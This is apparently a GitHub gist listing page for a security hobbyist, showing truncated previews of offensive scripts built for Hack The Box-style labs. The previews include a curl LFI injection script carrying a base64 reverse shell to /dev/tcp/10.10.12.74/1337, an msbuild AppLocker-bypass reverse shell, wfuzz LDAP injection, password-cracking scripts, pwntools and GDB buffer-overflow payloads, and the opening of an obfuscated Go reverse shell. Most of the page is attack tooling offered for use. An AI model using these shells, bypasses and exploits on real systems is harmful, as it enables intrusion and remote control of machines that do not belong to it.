I hereby claim:
- I am cdowns71 on github.
- I am dualfade (https://keybase.io/dualfade) on keybase.
- I have a public key ASDxw8oJN09Hj6abWb9Vc-BggpenCuRcRRWNa3j1r04UQwo
To claim this, I am signing this object:
dualfade
/ keybase.md
Created
September 7, 2018 18:02
dualfade
/ curl_php_post_LFI_Injection.sh
Last active
November 29, 2021 18:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # curl_post_LFI_Injection.sh | |
| # reverse nc bash shell -- | |
| # POST Data -- | |
| # --data-binary $"check=cXVhZ2dh" \ | |
| # ➜ echo "YjpcQXA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTIuNzQvMTMzNyAwPiYxCg==" | base64 -d | |
| # b:\Ap; bash -i >& /dev/tcp/10.10.12.74/1337 0>&1 | |
| # ~ |
dualfade
/ gist:41ea28b014a4375740af326ee5ad41ba
Created
December 13, 2018 19:47
7zip-jtr.sh; lord and savior baby jesus
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://gist.githubusercontent.com/bcoles/421cc413d07cd9ba7855/raw/fd8b6f0d63f88c334beb45d2615c8097f06743b6/7zip-jtr.sh | |
| #!/bin/bash | |
| # 7zip-JTR Decrypt Script | |
| # | |
| # Clone of JTR Decrypt Scripts by synacl modified for 7zip | |
| # - RAR-JTR Decrypt Script - https://synacl.wordpress.com/2012/02/10/using-john-the-ripper-to-crack-a-password-protected-rar-archive/ | |
| # - ZIP-JTR Decrypt Script - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/ | |
| echo "7zip-JTR Decrypt Script"; | |
| if [ $# -ne 2 ] |
dualfade
/ Chisel_Golang_PivotingUtility
Created
January 28, 2019 04:28
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/jpillora/chisel | |
| ┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] | |
| └[~/go/src/github.com/jpillora/chisel]> cd $GOPATH/src/github.com/jpillora/chisel | |
| ┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] | |
| └[~/go/src/github.com/jpillora/chisel]> go build | |
| ┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] | |
| └[~/go/src/github.com/jpillora/chisel]> ls -l chisel | |
| -rwxr-xr-x 1 cdowns cdowns 10539193 Jan 28 04:24 chisel* | |
| ┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] |
dualfade
/ msbuild.exe msf reverse shell x86
Last active
February 6, 2019 02:34
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Applocker bypass - Windows 2016 (Build 14393) x64 | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SoiYtuH7.xml | |
| //Microsoft (R) Build Engine version 4.6.1586.0 | |
| //[Microsoft .NET Framework, version 4.0.30319.42000] | |
| //Copyright (C) Microsoft Corporation. All rights reserved. | |
| //Build started 2/5/2019 8:55:26 PM. | |
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj --> |
dualfade
/ WFUZZ_LDAP_Injection.txt
Created
March 9, 2019 16:51
LDAP Encoded Filter Bypass - Find valid atributes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ./wfuzz -c -s 1 -z file,/home/cdowns/Documents/Hack_The_Box/CTF/ldap_attributes_all.txt,double,urencode -d 'inputUsername=ldapuser%2529%2528FUZZ%253D%252A&inputOTP=password' --hw 233 -u 'http://10.10.10.122/login.php' -p 127.0.0.1:8080 | |
| Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. | |
| ******************************************************** | |
| * Wfuzz 2.3.4 - The Web Fuzzer * | |
| ******************************************************** | |
| Target: http://10.10.10.122/login.php | |
| Total requests: 2026 |
dualfade
/ gist:ca19bf238f04bc568199d23b7b83af65
Created
March 14, 2019 22:14
JTR pkzip OMP_NUM_THREADS=
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /home/cdowns/Github/JohnTheRipper/run/./zip2john exploitme.zip > exploitme.john | |
| ver 2.0 efh 5455 efh 7875 exploitme.zip/membermanager PKZIP Encr: 2b chk, TS_chk, cmplen=3166, decmplen=10224, crc=32B64CF9 | |
| ver 2.0 efh 5455 efh 7875 exploitme.zip/memo PKZIP Encr: 2b chk, TS_chk, cmplen=3775, decmplen=13304, crc=FC9CDB4F | |
| NOTE: It is assumed that all files in each archive have the same password. | |
| If that is not the case, the hash may be uncrackable. To avoid this, use | |
| option -o to pick a file at a time. | |
| 4 CORE OPTINON -- | |
| NO POINT IN CRUSHING MY 8 CORES INO THE GROUND -- |
dualfade
/ gist:1f4aec48c1a48dd8719430989df1d277
Created
March 14, 2019 22:23
pwntools BO EUID Exec test --
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!usr/bin/env python | |
| import struct | |
| from pwn import * | |
| def gen_payload(start_addr, shellcode): | |
| context.arch='amd64' | |
| # Opcode for the NOP instruction | |
| nop = asm('nop', arch="amd64") | |
| nop1 = nop*72 # Create first NOP sled | |
dualfade
/ gist:938943cf573471944206e3e53bb5f3e3
Created
March 16, 2019 02:22
GDB exploit testing --
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from struct import * | |
| # bytes 400 -- | |
| buf = "" | |
| # offset to RIP | |
| buf += "A"*72 | |
| # overwrite RIP -- |
dualfade
/ gist:929ac87fe66cf6eb5fc8c47becb98b91
Last active
February 18, 2020 15:56
Golang Obfuscated x64 reverse shell --
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "encoding/binary" | |
| "syscall" | |
| "unsafe" | |
| ) | |
| const ( | |
| lXMIZpS = 0x1000 |
OlderNewer